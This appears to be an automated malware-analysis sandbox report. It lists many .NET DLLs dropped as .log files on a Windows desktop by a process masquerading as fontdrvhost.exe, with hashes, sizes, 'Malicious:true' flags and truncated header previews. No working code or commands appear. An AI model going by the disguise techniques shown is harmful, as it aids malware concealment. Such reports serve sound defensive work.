                                                                  C:\Users\user\Desktop\VPWFywnw.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\VWGgLdif.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\WAZwZzli.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\WYfWtHNc.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\WgOpYqoh.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\WuogHSdp.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\WvXEaKPX.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\WzsNMHNJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\XEIwxBIS.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\XFfNnXVZ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\XsyMwKeS.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\XxwvJouT.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\XzFFzMmI.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\XzKOkXsR.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\YBjETBXN.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\YMjefUJa.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\YOQFKOOU.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\YUSxJEkf.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\YVGePHcW.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\YnJNkaiG.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\YsHvxEyH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ZbufrXkm.log

                                                                  Download File
